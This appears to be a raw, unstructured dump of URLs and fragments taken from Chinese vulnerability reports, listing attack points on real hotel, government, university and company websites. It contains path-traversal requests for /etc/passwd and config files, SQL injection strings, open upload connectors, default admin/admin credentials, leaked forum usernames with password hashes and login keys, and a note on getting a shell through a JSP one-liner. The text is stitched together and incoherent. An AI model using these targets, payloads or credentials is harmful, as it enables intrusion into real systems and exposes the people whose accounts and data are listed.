dgdh.test.dossm.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 dggarden.royalhotels.cn/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 dgrhm.group.dossm.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 dzhgz.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 easelandhotel.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 electron.physics.buffalo.edu/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 fhschotel.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 guangzhougdhhotel.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 www.3496666.com www.aihotel.com www.baohonghotel.com www.baolilai-hotel.com www.baronyhotels.com www.bllhotel.com www.bmgcn.com www.chinameetings.cn www.cnicc.com www.colorfuldays-hotel.com www.coscohotels.cn www.coscohotels.com www.coscohotels.com.cn www.dgeahotel.com www.dgybhotel.com www.dzhgz.com www.dzyhotel.com www.easelandhotel.com www.ebdh-hotel.com www.eco-hotel.com.cn www.eversunshinehotel.com www.fcghotel.com www.fhschotel.com www.gbvh.com www.gdhhotels.com www.gdyutonghotel.com www.glamorhotel.com www.goldenhotel.com.cn www.goldsourcehotel.com www.guangzhougdhhotel.com www.guishanhotel.com www.hainanyataihotel.com www.harmonahotel.com www.hebs.asia www.horizon.com.cn www.horizoncbs.com www.horizonsanya.com www.hotelsjianguo.com www.huaponthotel.com www.hwndjd.com www.jadesea.cn www.jbstel.com www.jianguohotelgz.com www.jianliharmonyhotel.com www.jindinghotel.cn www.joyahotel.cn www.joyahotel.com www.kuntairoyalhotel.com www.lndfhotel-sh.com www.lphotel.cn www.lyhotspring.com www.muhaihotel.com www.oceanhotel.com.cn www.osresort.cn www.ouyahotels.com www.physics.buffalo.edu www.pinweijiudian.com www.prgardenhotel.com.cn www.qianzhouwan.com www.qsshotel.com www.ramadaplazagz.com www.regalia.com.cn www.resortgp.com www.resortintime.com www.rhgresorts.com www.risinghotel.com www.royalgardenhotel.com.cn www.royalhotels.cn www.royalmarinaplaza.com www.sanya31.com www.sanyabarry.com www.sanyaliking.com www.sevenraygolf.com www.shangrilaassociation.org www.singwood.com.cn www.soluxehotel.com www.soluxehotelgz.com www.sunshinehotel.com www.sunshinehotels.cn www.sunshinehotelzjj.com www.szjingdu.com www.tfsunshinehotel.com www.themulian.com www.tianfuyuan.com www.vaya-hotel.cn www.wakingtown-hotel.com www.wenfenghotel.com www.wintour.cn www.wmjh.cn www.wuzhishanyatai.com www.wx-hotel.com www.xianhuamanwu.com www.xiaoqingmai.com www.xn--sjqu43axxn38f.com www.xsfd.com www.yalongbaygolfclub.com www.yangshuoholiday.com www.yfkxhotel.com www.yhihotel.com www.yingbinhotel.cn www.ysdidu.com www.znhyfd.cn www.zzghhotel.com http://www.easelandhotel.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 aihotel.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 baohonghotel.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 baolilai-hotel.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 bmgcn.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 chinameetings.cn/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 dehan.test.dossm.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 devpaytmpl3v15.test.dossm.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 dgdh.test.dossm.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 dggarden.royalhotels.cn/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 dgrhm.group.dossm.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 dzhgz.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 easelandhotel.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 electron.physics.buffalo.edu/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 fhschotel.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 guangzhougdhhotel.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 www.3496666.com www.aihotel.com www.baohonghotel.com www.baolilai-hotel.com www.baronyhotels.com www.bllhotel.com www.bmgcn.com www.chinameetings.cn www.cnicc.com www.colorfuldays-hotel.com www.coscohotels.cn www.coscohotels.com www.coscohotels.com.cn www.dgeahotel.com www.dgybhotel.com www.dzhgz.com www.dzyhotel.com www.easelandhotel.com www.ebdh-hotel.com www.eco-hotel.com.cn www.eversunshinehotel.com www.fcghotel.com www.fhschotel.com www.gbvh.com www.gdhhotels.com www.gdyutonghotel.com www.glamorhotel.com www.goldenhotel.com.cn www.goldsourcehotel.com www.guangzhougdhhotel.com www.guishanhotel.com www.hainanyataihotel.com www.harmonahotel.com www.hebs.asia www.horizon.com.cn www.horizoncbs.com www.horizonsanya.com www.hotelsjianguo.com www.huaponthotel.com www.hwndjd.com www.jadesea.cn www.jbstel.com www.jianguohotelgz.com www.jianliharmonyhotel.com www.jindinghotel.cn www.joyahotel.cn www.joyahotel.com www.kuntairoyalhotel.com www.lndfhotel-sh.com www.lphotel.cn www.lyhotspring.com www.muhaihotel.com www.oceanhotel.com.cn www.osresort.cn www.ouyahotels.com www.physics.buffalo.edu www.pinweijiudian.com www.prgardenhotel.com.cn www.qianzhouwan.com www.qsshotel.com www.ramadaplazagz.com www.regalia.com.cn www.resortgp.com www.resortintime.com www.rhgresorts.com www.risinghotel.com www.royalgardenhotel.com.cn www.royalhotels.cn www.royalmarinaplaza.com www.sanya31.com www.sanyabarry.com www.sanyaliking.com www.sevenraygolf.com www.shangrilaassociation.org www.singwood.com.cn www.soluxehotel.com www.soluxehotelgz.com www.sunshinehotel.com www.sunshinehotels.cn www.sunshinehotelzjj.com www.szjingdu.com www.tfsunshinehotel.com www.themulian.com www.tianfuyuan.com www.vaya-hotel.cn www.wakingtown-hotel.com www.wenfenghotel.com www.wintour.cn www.wmjh.cn www.wuzhishanyatai.com www.wx-hotel.com www.xianhuamanwu.com www.xiaoqingmai.com www.xn--sjqu43axxn38f.com www.xsfd.com www.yalongbaygolfclub.com www.yangshuoholiday.com www.yfkxhotel.com www.yhihotel.com www.yingbinhotel.cn www.ysdidu.com www.znhyfd.cn www.zzghhotel.com http://superbuy.mplife.com/Wap/Pay/Verify.aspx?referrerUrl=http%3a%2f%2fsuperbuy.mplife.com%2fwap%2fpay%2fMyOrder.aspx%3fm%3d1%26i%3d0eea53a3-2ea3-45c4-bbf1-044bfe0ed0ff http://bsm.sdidc.com.cn/logout.do?type=manager http://219.238.150.151:8088/login.action http://mss.95522.cn/vote/vote/?param=6e20ccf582c0145f71362141037cfb4e&openId=opKa3jlaQnSyVRN4LgdjDZ_jEU4Y&randomNum=487336 http://mss.95522.cn/vote/vote/?param=b17215b9a8f3add82f2a2a27772bc6eb&openId=opKa3jqdKN6IsSDeG23E_t5PeIkc&randomNum=931840 http://mss.95522.cn/vote/vote/?param=2e0aa04b56e5dcfdc4bc751ab7570b3a&openId=opKa3jifz0o9GvxHU5c7a3KRkRoQ&randomNum=089853 http://mss.95522.cn/vote/agentInfo/ http://cwch.ahu.edu.cn/querynetweb/admin/UserManager.aspx http://cwch.ahu.edu.cn/querynetweb/ http://www.xinnet.com/user/user.do?method=toFindPwd http://**.**.**.**/bugs/wooyun-2015-0123148上一个 http://www.masterlink.com.tw http://www.masterlink.com.tw:2480 http://www.masterlink.com.tw/DownloadFile.aspx?filename=../web.config&tableName=Download&serialNo=2286 http://gps.ha-online.cn/ http://gps.ha-online.cn/login.action http://gps.ha-online.cn/test.txt http://im.suning.com/updates/ http://im.suning.com/updates/DEV/CPP/WINDOWS/1.4.5.1/ http://www.tdxinfo.com https://member.tdxinfo.com http://store.tdxinfo.com http://www.sinochemoil.com/esbclient/database/datebase_back.php http://yjsgl.suda.edu.cn/gmis/login.aspx http://isv.chinac.com:80/manufacturer_tologin.action http://isv.chinac.com:80/manufacturer_tologin.action http://my.dance365.com/site/email http://yxzfs.csc.edu.cn/scholarship/main/person/login.jsf http://beta.buy.mplife.com/admin http://**.**.**.**/bugs/wooyun-2010-0104635 http://**.**.**.**/bugs/wooyun-2010-0102444 http://**.**.**.**/bugs/wooyun-2015-091128 http://xuntejing.tsgaj.gov.cn/posts.php?type=../../../../../../../etc/passwd http://www.dfgjj.dfmc.com.cn/ShowNews.aspx?Id=2345 http://xwzx.cqupt.edu.cn/xwzx/news_search.php?string=aa&type=content download.dili360.com/?act=download&vid=2】 http://isv.chinac.com:80/manufacturer_tologin.action http://jkgj.114gh.cn/ http://jkgj.114gh.cn/FindPassWord.aspx site:macom.263.net/ http://macom.263.net/audit!login.action?username=zhuangmingfang@tse-c.com.cn&tempkey=BcPpXaSon4&auditLog=ff8080814b218950014b242b4e9928d9&status=4&opinion=1 Re:P42M相关资料需求 http://macom.263.net/audit!login.action?username=zhuangmingfang@tse-c.com.cn&tempkey=BcPpXaSon4&auditLog=ff8080814b218950014b242b4e9928d9&status=4&opinion=1 http://macom.263.net/audit!login.action?username=zhuangmingfang@tse-c.com.cn&tempkey=BcPpXaSon4&auditLog=ff8080814b218950014b242b4e9928d9&status=4&opinion=1 http://macom.263.net/audit!login.action?username=wdm@sanwa-group.com.cn&tempkey=M3uLfp2kgL&auditLog=ff8080814afd7cd4014b057446fa6248&status=4&opinion=1 http://news.jschina.com.cn/system/2014/09/24/021963438.shtml site:jsids.telecomjs.com https://www.baidu.com/s?wd=site%3Ajsids.telecomjs.com&pn=0&oq=site%3Ajsids.telecomjs.com&tn=baiduhome_pg&ie=utf-8&rsv_idx=2&rsv_pq=d4337223000136ae&rsv_t=6a2c3z6LhF1hMKAaSJnlAhmu2wNj2nWwp2LSaAr4KkTC9GzcfyQM1Bi67nBN7p6YsFDa http://jsids.telecomjs.com/ida40/print.jhtml?isHistory=Y&itemCode=IDT_PUB_PRINT_OPEN_BILLDETAIL&billId=2021335246&natId=0000005&billType=1 http://wt.etao189.com/login.jhtml http://**.**.**.**/bugs/wooyun-2015-0110745而发 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:8001/default.aspx http://**.**.**.**/ http://**.**.**.**/fygx/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:8080/ http://**.**.**.**:81/ http://ebusiness.coscon.com/ebcd/security/freightEntrustCdList/toEdit.do?cdBasicUuid=230117&userId=AIRTIGEREXPRESSQ http://ebusiness.coscon.com/ebcd/security/freightEntrustCdList/toEdit.do?cdBasicUuid=230118&userId=AIRTIGEREXPRESSQ http://ebusiness.coscon.com/ebcd/security/freightEntrustCdList/toEdit.do?cdBasicUuid=230119 inurl:bbs.tianya.cn/?username inurl:bbs.tianya.cn/?password http://bbs.tianya.cn/m/post-free-4955110-1.shtml?openudid=5E5F256F-6141-4A0D-B7E5-3D7BA2607D3A&device=iphone&userid=5436755&username=poper001&password=c0b799e410766626 http://bbs.tianya.cn/m/post-free-5105951-1.shtml?openudid=cc50fb8f78e24a9a4876de9b859c35ac3fb6c3e0&device=iphone&userid=5506474 http://bbs.tianya.cn/m/post-worldlook-466596-1.shtml?openudid=C489AA85-C3DD-4AB8-9671-6FD03E876BAD&device=iphone&userid=5570692&username=shark8860&password=b4dad5a0ea8624a7 http://bbs.tianya.cn/m/post-free-5044854-1.shtml?openudid=057333EA-09F2-47EC-AF04-AA3C6213F6E1&device=iphone&userid=15048341&username=leng007z&password=262f4b349a4b9576 http://mp.weixin.qq.com/ http://www.centfor.com/admin/login.php http://222.74.229.206:8080/Main/LogIn.aspx http://222.74.229.220/Main/LogIn.aspx http://www.cqgp.gov.cn/home/1/pages/picNewsContent.jsp?id=8 http://www.cqgp.gov.cn/home/1/pages/picNewsC http://sqlmap.org http://www.centfor.com/htdocs.zip http://www.centfor.com/phpmyadmin/ http://www.hadc.gov.cn/info/ http://www.hadc.gov.cn/info/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.hadc.gov.cn/info/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=%2F http://www.hadc.gov.cn/info/FCKeditor/editor/filemanager/browser/default/frmupload.html http://lama.youku.com/Admin/index.php/Public/login url:http://61.153.250.106:81/manager/html user:admin pass:admin http://ticket.china.com.cn//admin/ http://china-aibo.cn/ http://china-aibo.cn/piw/Api/Download.jsp?path=/WEB-INF/web.xml&fileName=web.xml http://china-aibo.cn/piw/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/../../ http://**.**.**.**/webpages/powercode_public_list_page.aspx http://**.**.**.**/tzptweb/webpages/powercode_public_list_page.aspx http://**.**.**.**/webpages/message_list_page.aspx http://**.**.**.**/tzptweb/webpages/message_list_page.aspx http://**.**.**.**/bugs/wooyun-2015-0100250没有重复,文件不同。 http://**.**.**.**//webpages/service_list_page.aspx http://**.**.**.**/tzptweb//webpages/service_list_page.aspx http://www.bjzbb.com http://www.bjzbb.com/piw/Api/Download.jsp?path=/WEB-INF/web.xml&fileName=web.xml http://www.bjzbb.com/piw/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/../../ http://www.bjzbb.com/piw/1.jsp http://**.**.**.**/ http://**.**.**.**/Web/Login.aspx http://**.**.**.**/Web/CommonPage.aspx?Id=14 http://**.**.**.**/Web/CommonPage.aspx?Id=14 http://**.**.**.**/Web/CommonPage.aspx?Id=6 http://**.**.**.** http://**.**.**.**/Web/Qikan.aspx http://**.**.**.**/CommonPage.aspx?Id=6 http://**.**.**.**/web/CommonPage.aspx?Id=36 http://**.**.**.**/Web/CommonPage.aspx?Id=1 http://**.**.**.**/Web/CommonPage.aspx?Id=1 http://**.**.**.**/Web/Qikan.aspx http://www.xbiao.com:80/ http://www.hnbyoa.com/,此处验证码只是摆设,截包时发现根本没用到,用猪猪侠的常用用户名可获得一百多个有效账号,登陆后可查看河南日报报业集团所有人员联系方式(权限高的账号可以看到高层具体联系方式,里面包括张建董事长联系方式),还可进入档案管理系统、内部通讯系统等。在“个人信息”“上传照片”处,可突破限制上传jsp一句话,用菜刀连接getshell,发现前人留马痕迹,我自己上传的在最上面,已删。里面可以找到服务器配置信息,获取用户和密码。 http://kaoshi.centfor.com/WebResource.axd?d=1436061238 http://kaoshi.centfor.com/WebResource http://221.7.54.196:90 http://221.7.54.196:90/console http://qyy.baidu.com/light/index?control=manage&plugid=pl1&cptid=abc&cptname=list&pkg=lego&token=B8t3dNUZSJ6Fy3QdJxkU9qETHoG6KV10Y96VVAPQRNAzEA7Y&caction=addpost&classid=cl12324959920305858&postid=po12481608043951994 http://services3.aastocks.com/xyzq/market_stockquote_server.aspx?symbol=03968&stockid=hk&source=AA&newsid=NOW.676866 https://ws.lightinthebox.com/zh/signin shopping.55bbs.com/market_23105.html shopping.55bbs.com/market/info_all_0_14__1.html http://mail.dlairport.com http://mail.dlairport.com/mail.zip http://damotools.apphb.com/getimg.aspx www.rongji.com及www.rongji.com.cn www.rongji591.com ip:114.112.70.142 domain:g.candou.com http://paas-developer.huawei.com/home/login.htm http://qfoa.qfkd.com.cn/setqfkd/login.aspx txtUserName:admin txtUserPwd:adad http://product.cnmo.com/ http://**.**.**.**/bugs/wooyun-2015-0122261 http://**.**.**.**/epg/template/template498/pvclient.php?movieid=278112856&_=1435414312519 http://www.gdzjb.gov.cn/News.aspx?CategoryID=7&Id=7608 http://www.gdzjb.gov.cn/News.aspx?CategoryID=7&Id=7608 http://www.gdzjb.gov.cn/News.aspx?CategoryID=7&Id=7608 http://www.gdzjb.gov.cn/Admin/AdminLogin.aspx?ReturnUrl=%2fadmin%2fDefault.aspx http://www.gdzjb.gov.cn/Admin/Download.aspx http://www.gdzjb.gov.cn/uploadfile/wooyun.asp password:wooyun http://www.sfi.org.tw http://libsvr.sfi.org.tw:80/torica97web/cc/cc_detail.asp?ccno=0000010630&mkey=6%20AND%203*2*1%3d6%20AND%20108%3d108&t1=%B4%C1%A5Z%A4%E5%B3%B9%ACd%B8%DF%B5%B2%AAG http://survey.book.sina.com.cn/list_search.php?channel_id=1&order=hot&page=2 http://96368.hntobacco.com/ecweb/notice/sysNoticeEditor.htm http://219.141.211.68/ http://219.141.211.68/WebResource.axd?d=_hLB41yG9DcuGF4Ww2NoOw2 http://219.141.211.68/ScriptResource.axd http://219.141.211.68/ScriptResource.axd?d=p6hCOseKeZTj8wE3klIzh9pWd-i7Q8-A4nlQQ71t8CAAAAAAAAAAAAAAAAAAAAAA0 http://antivirus.wanfangdata.com.cn/phpmyadmin/ http://antivirus.wanfangdata.com.cn/admin/login.php http://www.peng-xin.com.cn/dichan/manager/default.asp http://14.29.1.11:8080/platform/index.action http://travel.haier.com/travel/Hotel/SPHotelInfo/ChangePwd.aspx http://**.**.**.**//SoftWarer//include/softversion.asp?cType= http://**.**.**.**:8010//SoftWarer//include/softversion.asp?cType= http://www.lianhe18.com/riskinfo.aspx?type=fwpz&img=1&cardno=2018800001 http://www.lianhe18.com/riskinfo.aspx?type=fwpz&img=1&cardno=2018824900 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=4116600001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=4116625000 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=5218805001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=5218884258 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=5221500001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=5221552401 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=7118802100 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=7118825000 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=8118820001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=8118899999 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9661500001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9661510001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9771500001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9771536000 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9881500001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9881543000 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9991500001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9991520001 https://mall.gree.com/mall/FindAddressCmd?catalogId=10001&id=1360256&langId=-7&storeId=10652 https://mall.gree.com/mall/FindAddressCmd?catalogId=10001&id=1360154&langId=-7&storeId=10652 https://mall.gree.com/mall/FindAddressCmd?catalogId=10001&id=1360160&langId=-7&storeId=10652 http://m.zxhsd.com http://3g.i.xywy.com/index/login http://www.shyule.org/ http://www.bio-tag.com.cn/ftb.imagegallery.aspx http://www.iliangcang.com/i/shop/list/?cat_id=00010009 http://m.weifengke.com/uact/login?referer=http://m.weifengke.com http://www.fs121.com/zwgk.aspx?c=030101 http://peixun.centfor.com/UserAction!login.action http://vios.19lou.com/vios.19lou.com.sql http://mpl.m3guo.com/index.php?mod=schedule&team=1%27 http://www.aokang.cn/ http://www.ynzb.com.cn/Branch.aspx?Num=QY_20070925101048734 http://222.73.234.172/ http://mm.263.com http://dj.teamnet.cc:888/ http://dj.teamnet.cc:8090/ http://dj.teamnet.cc:8090/logs/access.log.20150704 http://115.29.98.188:8090/smartmmsc/blog_magazine_manage.do?action=new http://115.29.98.188:8090/smartmmsc/ http://gpms.foton.com.cn/uapws/ http://erp.suning.com.cn/uapws/ http://fm2.cscec.com/uapws/ http://bap.ufida.com/uapws/ http://61.178.99.236:9002/uapws/ http://zc.hayao.com:8080/uapws/ http://221.1.83.115:9001/uapws/ http://hr.meten.com/user/four?uid=10 http://hr.meten.com/user/findpwd ftp://123.71.192.123/ http://golf.163.com/e/action/ListInfo/index.php?page=1&classid=340&state=1&keyboard=13 http://fenxiaoportal.shopnum1.com/ShoppingCart1.aspx?MemLoginID=TEST124 http://fenxiaoportal.shopnum1.com/ShoppingCart2.aspx?MemLoginID=TEST124 http://wdcx.yundasys.com:81/yd_wd_cas/php1/ff_dtl.php?page_no=2&gsbm=617001&start=2015-03-07%2000:00:00&end=2015-03-07%2023:59:59&sfd=&psywy=9997 http://wdcx.yundasys.com:81/yd_wd_cas/php1/ff_dtl.php?page_no=2&gsbm=617001&start=2015-03-07%2000:00:00&end=2015-03-07%2023:59:59&sfd=&psywy=9997 http://**.**.** http://**.**.**/web/ http://**.**.**/system/Login.aspx http://www.jsqcys.com/Resources/download/634859132300308438.txt文件内存在系统密码等信息,并且经过测试结算平台可以使用admin用户登录。 http://eladies.sina.com.hk/cgi-bin/video/main.cgi?action=list&cat=284&page=5&total=182 http://www.qfkd.com.cn/setqfkd/login.aspx http://oa.qfkd.com.cn/setqfkd/login.aspx http://qfoa.qfkd.com.cn/setqfkd/login.aspx http://sj.pay.xoyo.com http://mail.lvmama.com/ http://email.cntv.cn/ http://fenxiao.lvmama.com/ http://61.191.56.216/ http://www.mangocity.com/index.php/freeline/productinfo_controller/journey_print?thirdpartid=222292p2 http://weixin.sudu.cn/ http://sqlmap.org http://kpi.focus.cn/.git/config ip:112.124.7.74 domain:websocket.btcchina.com URL:http://app.eben.cn/index/appcatf/?q=-1 URL:http://app.eben.cn/index/appcat/t3/?q=-1 URL:http://app.eben.cn//index/providerf/73/%E9%97%AA%E5%8A%A8%E7%A7%91%E6%8A%80?q=-1 URL:http://app.eben.cn/index/providerf/54/%E7%88%B1%E7%B1%B3%E5%90%A7?q=-1 http://app.eben.cn/index/appcatf/?q=-1 ip:125.39.185.150 ftp://218.201.55.189/ ip:203.195.205.41 http://api.duoqu.com/op/login?op=33&g=19&customerId=53511&data=eyJnYW1lSWQiOiI4NiIsImdhdGVXYXlJZCI6InMxMTciLCJpc0FkdWx0IjoiMSIsIm5pY2tOYW1lIjoiamQzOTIyNjJjdGQiLCJ1c2VySWQiOiIyODY3MDU0OTM5NiIsInVzZXJMZXZlbCI6IjExIn0=&identify=e8839c36-00df- ip:199.115.98.130 https://krt.swsc.com.cn/pages/login/loginCheckCode.action ip:122.226.73.177 http://wooyun.org/bugs/wooyun-2015-098434 http://crshdi.crcc.cn自动跳到http://www.sty.sh.cn/web/index.asp这个站上面 http://www.sty.sh.cn/web/kjcx_kcsj_list.asp?id=261&sslb=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&bz=%EF%BF%BD%EF%BF%BD%EF%BF%BD%E3%B9%A4%EF%BF%BD%CC%BF%EF%BF%BD%EF%BF%BD%EF%BF%BD http://tc.homelink.com.cn http://bstest.creditease.cn/toLogin http://store.eben.cn:80/book/tag/500-1'%20OR%203*2*1%3d6%20AND%20000156%3d000156%20--%20 http://store.eben.cn:80/precinct/84?q=-1 http://store.eben.cn:80/magazine/search/?q=-1 http://store.eben.cn:80/precinct/1?q=-1 http://store.eben.cn:80/precinct/85?q=-1 http://store.eben.cn:80/precinct/86?q=-1 http://store.eben.cn:80/precinct/87?q=-1 http://aqgl.crcc.cn/index.do http://hceb.crcc.cn/web.zip http://tuan.17house.com/affordable.php?gid=1831 http://tuan.17house.com/affordable.php?gid=1831 Error:You Errno:1064 http://www.vigorddns.com/aboutuser/mngdomain.php http://www.vigorddns.com/aboutuser/updomain.php http://www.vigorddns.com/aboutuser/userdata.php http://gz.feixin.10086.cn/ http://221.176.30.209:8080/HttpInterface/SMsg/show/sdx/MTcxMzgwMTg0/idx/aWYobm93KCk9c3lzZGF0ZSgpLHNsZWVwKDMpLDAp(注入点)/tk/ee7a99e05daf3f9b3d20aeeb85f7dca7/inx/0/fclient/pc http://oa.kuaidadi.com:5013/seeyon/index.jsp http://oa.kuaidadi.com:5013/seeyon//logs/ctp.log http://oa.kuaidadi.com:5013/seeyon/addressbook.do?accountId=&addressbookType=1&method=initList&_spage=&page=1&count=1565&pageSize=100 http://oa.kuaidadi.com:5013/seeyon/organization/peopleCard.do?method=showPeoPleCard&type=withbutton&memberId='+id ip:61.172.238.249 http://119.147.80.161:8002 http://119.147.80.161:8002/webcall_chat/leaveMessage.jsp http://119.147.80.161:8002/webcall_chat/leaveMessage.jsp http://119.147.80.161:8002/webcall_chat/leaveMessage.jsp http://101.227.240.110:8989/baf/jsp/uiframe/login.jsp http://afk.vxcn.cn/afkadmin/listUser.aspx ip:168.63.211.159 http://zone.wooyun.org/content/21272),报着实践的心态,就深入了一下。 http://www.cmreltd.com:80/ www.cmreltd.com http://mp.fanwe.net http://121.14.129.235:9000/ http://115.28.253.225/workbench/login.jsp android:configChanges="keyboardHidden|orientation android:name="org.qiyi.android.video.activitys.FrameJumpActivity android:screenOrientation="portrait android:theme="@android:style/Theme.NoDisplay android:host="tv.pps.mobile android:scheme="iqiyi-phone android:pathPattern=".*res* android:name="android.intent.category.DEFAULT android:name="android.intent.action.VIEW android:name="android.intent.category.BROWSABLE iqiyi-phone://tv.pps.mobile这个伪协议,path格式为:.*res*.,因此通过iqiyi-phone://tv.pps.mobile/res就可以将该组件调起来。 http://www.boqii.com/complaints.html http://mail.cnplhd.com.cn/#lang=cn www.bjhike.com http://www.poemston.com/ http://**.**.**.**//admini//item/itempic.aspx?itemID=20150100257 http://**.**.**.**/admini//item/itempic.aspx?itemID=20150100257 http://**.**.**.**//admini//item/itempic.aspx?itemID=20150100257 http://**.**.**.**///admini//item/itempic.aspx?itemID=20150100257 http://**.**.**.**//admini//item/itempic.aspx?itemID=20150100257 http://**.**.**.**/admini/newsTopic/newsTopicEdit.aspx?newid=393 http://**.**.**.**//admini/newsTopic/newsTopicEdit.aspx?newid=393 http://**.**.**.**//admini/newsTopic/newsTopicEdit.aspx?newid=393 http://**.**.**.**//admini/newsTopic/newsTopicEdit.aspx?newid=393 http://**.**.**.**//admini/newsTopic/newsTopicEdit.aspx?newid=393 http://www.bocweb.cn/ http://**.**.**/zhongxin//bocadmin/j/uploadify.php http://**.**.**//bocadmin/j/uploadify.php__吉利上海车展 http://**.**.**//bocadmin/j/uploadify.php__长业控股集团___中国民营企业500强_ http://**.**.**/bocadmin/j/uploadify.php__海亮集团___中国民营企业500强_ http://**.**.**//bocadmin/j/uploadify.php___伟星控股集团 http://**.**.**//bocadmin/j/uploadify.php__浙江浙大网新置地管理有限公司 http://**.**.**//bocadmin/j/uploadify.php___步森男装官网 http://**.**.**/bocadmin/j/uploadify.php_ http://**.**.**//bocadmin/j/uploadify.php___杭州恒生科技园___上市公司_ http://**.**.**//bocadmin/j/uploadify.php___宋都股份___上市公司_ http://**.**.**//bocadmin/j/uploadify.php__道明光学股份___上市公司_ http://**.**.**/bocadmin/j/uploadify.php___歌山建设集团___集团_ http://**.**.**//bocadmin/j/uploadify.php__富通集团有限公司__集团_ http://**.**.**/xny//bocadmin/j/uploadify.php__赛丽控股集团___集团_ http://**.**.**/m//bocadmin/j/uploadify.php__博采官网___博采科技官网_ http://**.**.**/bocadmin/j/uploadify.php http://**.**.**/bocadmin/j/uploadify.php http://**.**.**//bocadmin/j/uploadify.php http://**.**.**/bocadmin/j/uploadify.php___建德市五星车业有限公司____ 